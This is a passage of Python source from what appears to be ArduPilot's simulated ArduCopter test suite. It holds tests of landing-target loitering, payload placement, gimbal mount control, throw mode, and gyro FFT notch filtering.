'''loiter to x, y, z from origin (in metres), z is *up*'''
dest_ned = rotmat.Vector3(x, y, -z)
tstart = self.get_sim_time()
success_start = -1
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Did not loiter to ne!")
m_pos = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
pos_ned = rotmat.Vector3(m_pos.x, m_pos.y, m_pos.z)
# print("dest_ned=%s" % str(dest_ned))
# print("pos_ned=%s" % str(pos_ned))
delta_ef = dest_ned - pos_ned
# print("delta_ef=%s" % str(delta_ef))
# determine if we've successfully navigated to close to
# where we should be:
dist = math.sqrt(delta_ef.x * delta_ef.x + delta_ef.y * delta_ef.y)
dist_max = 0.1
self.progress("dist=%f want <%f" % (dist, dist_max))
if dist < dist_max:
# success! We've gotten within our target distance
if success_start == -1:
success_start = now
elif now - success_start > 10:
self.progress("Yay!")
break
else:
success_start = -1
delta_bf = self.earth_to_body(delta_ef)
# print("delta_bf=%s" % str(delta_bf))
angle_x = math.atan2(delta_bf.y, delta_bf.z)
angle_y = -math.atan2(delta_bf.x, delta_bf.z)
distance = math.sqrt(delta_bf.x * delta_bf.x +
delta_bf.y * delta_bf.y +
delta_bf.z * delta_bf.z)
# att = self.mav.messages["ATTITUDE"]
# print("r=%f p=%f y=%f" % (math.degrees(att.roll), math.degrees(att.pitch), math.degrees(att.yaw)))
# print("angle_x=%s angle_y=%s" % (str(math.degrees(angle_x)), str(math.degrees(angle_y))))
# print("distance=%s" % str(distance))
self.mav.mav.landing_target_send(
0, # time_usec
1, # target_num
mavutil.mavlink.MAV_FRAME_GLOBAL, # frame; AP ignores
angle_x, # angle x (radians)
angle_y, # angle y (radians)
distance, # distance to target
0.01, # size of target in radians, X-axis
0.01 # size of target in radians, Y-axis
)
def fly_payload_place_mission(self):
"""Test payload placing in auto."""
self.context_push()
ex = None
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("GRIP_ENABLE", 1)
self.set_parameter("GRIP_TYPE", 1)
self.set_parameter("SIM_GRPS_ENABLE", 1)
self.set_parameter("SIM_GRPS_PIN", 8)
self.set_parameter("SERVO8_FUNCTION", 28)
self.set_parameter("RC9_OPTION", 19)
self.reboot_sitl()
self.set_rc(9, 2000)
# load the mission:
self.load_mission("copter_payload_place.txt")
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_text("Gripper load releas", timeout=90)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def fly_guided_change_submode(self):
""""Ensure we can move around in guided after a takeoff command."""
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
self.set_parameter("FS_GCS_ENABLE", 0)
self.set_parameter("DISARM_DELAY", 0) # until traffic problems are fixed
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=10)
self.start_subtest("yaw through absolute angles using MAV_CMD_CONDITION_YAW")
self.guided_achieve_heading(45)
self.guided_achieve_heading(135)
self.start_subtest("move the vehicle using set_position_target_global_int")
# the following numbers are 5-degree-latitude and 5-degrees
# longitude - just so that we start to really move a lot.
self.fly_guided_move_global_relative_alt(5, 5, 10)
self.start_subtest("move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED")
self.fly_guided_stop(groundspeed_tolerance=0.1)
self.fly_guided_move_local(5, 5, 10)
self.start_subtest("Check target position received by vehicle using SET_MESSAGE_INTERVAL")
self.test_guided_local_position_target(5, 5, 10)
self.test_guided_local_velocity_target(2, 2, 1)
self.test_position_target_message_mode()
self.do_RTL()
def test_gripper_mission(self):
self.context_push()
ex = None
try:
self.load_mission("copter-gripper-mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.assert_vehicle_location_is_at_startup_location()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_statustext("Gripper Grabbed", timeout=60)
self.wait_statustext("Gripper Released", timeout=60)
except Exception as e:
self.print_exception_caught(e)
self.change_mode('LAND')
ex = e
self.context_pop()
self.wait_disarmed()
if ex is not None:
raise ex
def test_spline_last_waypoint(self):
self.context_push()
ex = None
try:
self.load_mission("copter-spline-last-waypoint.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_altitude(10, 3000, relative=True)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.do_RTL()
self.wait_disarmed()
if ex is not None:
raise ex
def fly_manual_throttle_mode_change(self):
self.set_parameter("FS_GCS_ENABLE", 0) # avoid GUIDED instant disarm
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("ACRO")
self.change_mode("STABILIZE")
self.change_mode("GUIDED")
self.set_rc(3, 1700)
self.watch_altitude_maintained(-1, 0.2) # should not take off in guided
self.run_cmd_do_set_mode(
"ACRO",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"STABILIZE",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"DRIFT",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.progress("Check setting an invalid mode")
self.run_cmd(
mavutil.mavlink.MAV_CMD_DO_SET_MODE,
mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
126,
0,
0,
0,
0,
0,
want_result=mavutil.mavlink.MAV_RESULT_FAILED,
timeout=1
)
self.set_rc(3, 1000)
self.run_cmd_do_set_mode("ACRO")
self.wait_disarmed()
def test_mount_pitch(self, despitch, despitch_tolerance, timeout=10, hold=0):
tstart = self.get_sim_time()
success_start = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Mount pitch not achieved")
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
# self.progress("pitch=%f roll=%f yaw=%f" %
# (m.pointing_a, m.pointing_b, m.pointing_c))
mount_pitch = m.pointing_a/100.0 # centidegrees to degrees
if abs(despitch - mount_pitch) > despitch_tolerance:
self.progress("Mount pitch incorrect: got=%f want=%f (+/- %f)" %
(mount_pitch, despitch, despitch_tolerance))
success_start = 0
continue
self.progress("Mount pitch correct: %f degrees == %f" %
(mount_pitch, despitch))
if success_start == 0:
success_start = now
continue
if now - success_start > hold:
self.progress("Mount pitch achieved")
return
def do_pitch(self, pitch):
'''pitch aircraft in guided/angle mode'''
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, math.radians(pitch), 0]), # att
0, # roll rate (rad/s)
1, # pitch rate
0, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
def test_mount(self):
ex = None
self.context_push()
old_srcSystem = self.mav.mav.srcSystem
self.mav.mav.srcSystem = 250
self.set_parameter("DISARM_DELAY", 0)
try:
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
self.set_parameter("FS_GCS_ENABLE", 0)
self.progress("Setting up servo mount")
roll_servo = 5
pitch_servo = 6
yaw_servo = 7
self.set_parameter("MNT_TYPE", 1)
self.set_parameter("SERVO%u_FUNCTION" % roll_servo, 8) # roll
self.set_parameter("SERVO%u_FUNCTION" % pitch_servo, 7) # pitch
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 6) # yaw
self.reboot_sitl() # to handle MNT_TYPE changing
# make sure we're getting mount status and gimbal reports
self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
self.mav.recv_match(type='GIMBAL_REPORT',
blocking=True,
timeout=5)
# test pitch isn't stabilising:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff()
despitch = 10
despitch_tolerance = 3
self.progress("Pitching vehicle")
self.do_pitch(despitch) # will time out!
self.wait_pitch(despitch, despitch_tolerance)
# check we haven't modified:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.progress("Enable pitch stabilization using MOUNT_CONFIGURE")
self.mav.mav.mount_configure_send(
1, # target system
1, # target component
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0, # stab-roll
1, # stab-pitch
0)
self.do_pitch(despitch)
self.test_mount_pitch(-despitch, 1)
self.progress("Disable pitch using MAV_CMD_DO_MOUNT_CONFIGURE")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0)
self.progress("Point somewhere using MOUNT_CONTROL (ANGLE)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
20 * 100, # pitch
20 * 100, # roll (centidegrees)
0, # yaw
0 # save position
)
self.test_mount_pitch(20, 1)
self.progress("Point somewhere using MOUNT_CONTROL (GPS)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_GPS_POINT,
0,
0,
0,
0,
0,
0,
)
start = self.mav.location()
self.progress("start=%s" % str(start))
(t_lat, t_lon) = mavextra.gps_offset(start.lat, start.lng, 10, 20)
t_alt = 0
self.progress("loc %f %f %f" % (start.lat, start.lng, start.alt))
self.progress("targetting %f %f %f" % (t_lat, t_lon, t_alt))
self.do_pitch(despitch)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
int(t_lat * 1e7), # lat
int(t_lon * 1e7), # lon
t_alt * 100, # alt
0 # save position
)
self.test_mount_pitch(-52, 5)
# now test RC targetting
self.progress("Testing mount RC targetting")
# this is a one-off; ArduCopter *will* time out this directive!
self.progress("Levelling aircraft")
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, 0, 0]), # att
1, # roll rate (rad/s)
1, # pitch rate
1, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
try:
self.context_push()
self.set_parameter('MNT_RC_IN_ROLL', 11)
self.set_parameter('MNT_RC_IN_TILT', 12)
self.set_parameter('MNT_RC_IN_PAN', 13)
self.progress("Testing RC angular control")
# default RC min=1100 max=1900
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
self.test_mount_pitch(0, 1)
self.progress("Testing RC input down 1/4 of its range in the output, should be down 1/4 range in output")
rc12_in = 1400
rc12_min = 1100 # default
rc12_max = 1900 # default
angmin_tilt = -45.0 # default
angmax_tilt = 45.0 # default
expected_pitch = (float(rc12_in-rc12_min)/float(rc12_max-rc12_min) * (angmax_tilt-angmin_tilt)) + angmin_tilt
self.progress("expected mount pitch: %f" % expected_pitch)
if expected_pitch != -11.25:
raise NotAchievedException("Calculation wrong - defaults changed?!")
self.set_rc(12, rc12_in)
self.test_mount_pitch(-11.25, 0.01)
self.set_rc(12, 1800)
self.test_mount_pitch(33.75, 0.01)
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
try:
self.progress(
"Issue https://discuss.ardupilot.org/t/"
"gimbal-limits-with-storm32-backend-mavlink-not-applied-correctly/51438"
)
self.context_push()
self.set_parameter("RC12_MIN", 1000)
self.set_parameter("RC12_MAX", 2000)
self.set_parameter("MNT_ANGMIN_TIL", -9000)
self.set_parameter("MNT_ANGMAX_TIL", 1000)
self.set_rc(12, 1000)
self.test_mount_pitch(-90.00, 0.01)
self.set_rc(12, 2000)
self.test_mount_pitch(10.00, 0.01)
self.set_rc(12, 1500)
self.test_mount_pitch(-40.00, 0.01)
finally:
self.context_pop()
self.set_rc(12, 1500)
self.progress("Testing RC rate control")
self.set_parameter('MNT_JSTICK_SPD', 10)
self.test_mount_pitch(0, 1)
self.set_rc(12, 1300)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-20, 1)
self.set_rc(12, 1700)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(0, 1)
self.test_mount_pitch(5, 1)
self.progress("Reverting to angle mode")
self.set_parameter('MNT_JSTICK_SPD', 0)
self.set_rc(12, 1500)
self.test_mount_pitch(0, 0.1)
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
self.context_pop()
raise e
self.progress("Testing mount ROI behaviour")
self.drain_mav_unparsed()
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_LOCATION")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_LOCATION,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-52, 5)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-7.5, 1)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT)")
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
)
self.test_mount_pitch(-7.5, 1)
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT), absolute-alt-frame")
# this is pointing essentially straight down
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL,
)
self.test_mount_pitch(-70, 1, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("Testing mount roi-sysid behaviour")
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_SYSID")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_SYSID,
250,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
0 * 1000, # mm alt amsl
0 * 1000, # relalt mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(-89, 5, hold=2)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
670 * 1000, # mm alt amsl
100 * 1000, # mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(68, 5, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("checking ArduCopter yaw-aircraft-for-roi")
try:
self.context_push()
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("current heading %u" % m.heading)
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 0) # yaw
self.progress("Waiting for check_servo_map to do its job")
self.delay_sim_time(5)
start = self.mav.location()
self.progress("Moving to guided/position controller")
# the following numbers are 1-degree-latitude and
# 0-degrees longitude - just so that we start to
# really move a lot.
self.fly_guided_move_global_relative_alt(1, 0, 0)
self.guided_achieve_heading(0)
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.wait_heading(110, timeout=600)
self.context_pop()
except Exception:
self.context_pop()
raise
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.mav.mav.srcSystem = old_srcSystem
self.disarm_vehicle(force=True)
self.reboot_sitl() # to handle MNT_TYPE changing
if ex is not None:
raise ex
def fly_throw_mode(self):
# test boomerang mode:
self.progress("Throwing vehicle away")
self.set_parameters({
"THROW_NEXTMODE": 6,
"SIM_SHOVE_Z": -30,
"SIM_SHOVE_X": -20,
})
self.change_mode('THROW')
self.wait_ready_to_arm()
self.arm_vehicle()
try:
self.set_parameter("SIM_SHOVE_TIME", 500, retries=3)
except ValueError:
# the shove resets this to zero
pass
tstart = self.get_sim_time()
self.wait_mode('RTL')
max_good_tdelta = 15
tdelta = self.get_sim_time() - tstart
self.progress("Vehicle in RTL")
self.wait_rtl_complete()
self.progress("Vehicle disarmed")
if tdelta > max_good_tdelta:
raise NotAchievedException("Took too long to enter RTL: %fs > %fs" %
(tdelta, max_good_tdelta))
self.progress("Vehicle returned")
def hover_and_check_matched_frequency_with_fft(self, dblevel=-15, minhz=200, maxhz=300, peakhz=None, reverse=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
freq = psd["F"][numpy.argmax(psd["X"][minhz:maxhz]) + minhz] * (1000. / 1024.)
peakdb = numpy.amax(psd["X"][minhz:maxhz])
if peakdb < dblevel or (peakhz is not None and abs(freq - peakhz) / peakhz > 0.05):
if reverse is not None:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
if reverse is not None:
raise NotAchievedException(
"Detected motor peak at %fHz, throttle %f%%, %fdB" %
(freq, vfr_hud.throttle, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
return freq, vfr_hud, peakdb
def fly_dynamic_notches(self):
"""Use dynamic harmonic notch to control motor noise."""
self.progress("Flying with dynamic notches")
self.context_push()
ex = None
try:
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100, # set the gyro filter high so we can observe behaviour
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
"SIM_GYR1_RND": 20,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 200, 300)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.,
"INS_HNTCH_HMNCS": 5, # first and third harmonic
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
})
self.reboot_sitl()
freq, vfr_hud, peakdb1 = self.hover_and_check_matched_frequency_with_fft(-10, 20, 350, reverse=True)
# now add double dynamic notches and check that the peak is squashed
self.set_parameter("INS_HNTCH_OPTS", 1)
self.reboot_sitl()
freq, vfr_hud, peakdb2 = self.hover_and_check_matched_frequency_with_fft(-15, 20, 350, reverse=True)
# double-notch should do better, but check for within 5%
if peakdb2 * 1.05 > peakdb1:
raise NotAchievedException(
"Double-notch peak was higher than single-notch peak %fdB > %fdB" %
(peakdb2, peakdb1))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def hover_and_check_matched_frequency(self, dblevel=-15, minhz=200, maxhz=300, fftLength=32, peakhz=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
scale = 1000. / 1024.
sminhz = int(minhz * scale)
smaxhz = int(maxhz * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < dblevel:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
elif peakhz is not None and abs(freq - peakhz) / peakhz > 0.05:
raise NotAchievedException("Did not detect a motor peak at %fHz, found %fHz at %fdB" % (peakhz, freq, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
# we have a peak make sure that the FFT detected something close
# logging is at 10Hz
mlog = self.dfreader_for_current_onboard_log()
# accuracy is determined by sample rate and fft length, given our use of quinn we could probably use half of this
freqDelta = 1000. / fftLength
pkAvg = freq
nmessages = 1
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
freqs = []
while m is not None:
nmessages = nmessages + 1
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
# peak within resolution of FFT length
pkAvg = numpy.median(numpy.asarray(freqs))
self.progress("Detected motor peak at %fHz processing %d messages" % (pkAvg, nmessages))
# peak within 5%
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a motor peak at %f, found %f, wanted %f" % (dblevel, pkAvg, freq))
return freq
def fly_gyro_fft_harmonic(self):
"""Use dynamic harmonic notch to control motor noise with harmonic matching of the first harmonic."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT harmonic - Gyro sample rate")
self.context_push()
ex = None
# we are dealing with probabalistic scenarios involving threads, have two bites at the cherry
try:
self.start_subtest("Hover to calculate approximate hover frequency")
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"FFT_THR_REF": self.get_parameter("MOT_THST_HOVER"),
"SIM_GYR1_RND": 20, # enable a noisy gyro
})
# motor peak enabling FFT will also enable the arming
# check, self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
})
# Step 1: inject actual motor noise and use the FFT to track it
self.set_parameters({
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 64)
# Step 2: add a second harmonic and check the first is still tracked
self.start_subtest("Add a fixed frequency harmonic at twice the hover frequency "
"and check the right harmonic is found")
self.set_parameters({
"SIM_VIB_FREQ_X": freq * 2,
"SIM_VIB_FREQ_Y": freq * 2,
"SIM_VIB_FREQ_Z": freq * 2,
"SIM_VIB_MOT_MULT": 0.25, # halve the motor noise so that the higher harmonic dominates
})
self.reboot_sitl()
self.hover_and_check_matched_frequency(-15, 100, 250, 64, None)
# Step 3: switch harmonics mid flight and check for tracking
self.start_subtest("Switch harmonics mid flight and check the right harmonic is found")
self.set_parameter("FFT_HMNC_PEAK", 0)
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 10
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_parameter("SIM_VIB_MOT_MULT", 5.0)
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
mlog = self.dfreader_for_current_onboard_log()
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
freqs = []
while m is not None:
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
# peak within resolution of FFT length, the highest energy peak switched but our detection should not
pkAvg = numpy.median(numpy.asarray(freqs))
freqDelta = 1000. / self.get_parameter("FFT_WINDOW_SIZE")
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a harmonic motor peak, found %f, wanted %f" % (pkAvg, freq))
# Step 4: dynamic harmonic
self.start_subtest("Enable dynamic harmonics and make sure both frequency peaks are attenuated")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 100, 350)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_HMNCS": 3,
"INS_HNTCH_MODE": 4,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.0,
"INS_HNTCH_ATT": 100,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_OPTS": 3,
})
self.reboot_sitl()
# 5db is far in excess of the attenuation that the double dynamic-harmonic notch is able
# to provide (-7dB on average), but without the notch the peak is around 20dB so still a safe test
self.hover_and_check_matched_frequency_with_fft(5, 100, 350, reverse=True)
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MULT": 1.0,
})
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# need a final reboot because weird things happen to your
# vehicle state when switching back from EKF type 10!
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gyro_fft(self):
"""Use dynamic harmonic notch to control motor noise."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT - Gyro sample rate")
self.context_push()
ex = None
try:
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"SIM_GYR1_RND": 20, # enable a noisy motor peak
})
# enabling FFT will also enable the arming check,
# self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
"FFT_WINDOW_SIZE": 128,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 0,
})
# Step 1: inject a very precise noise peak at 250hz and make sure the in-flight fft
# can detect it really accurately. For a 128 FFT the frequency resolution is 8Hz so
# a 250Hz peak should be detectable within 5%
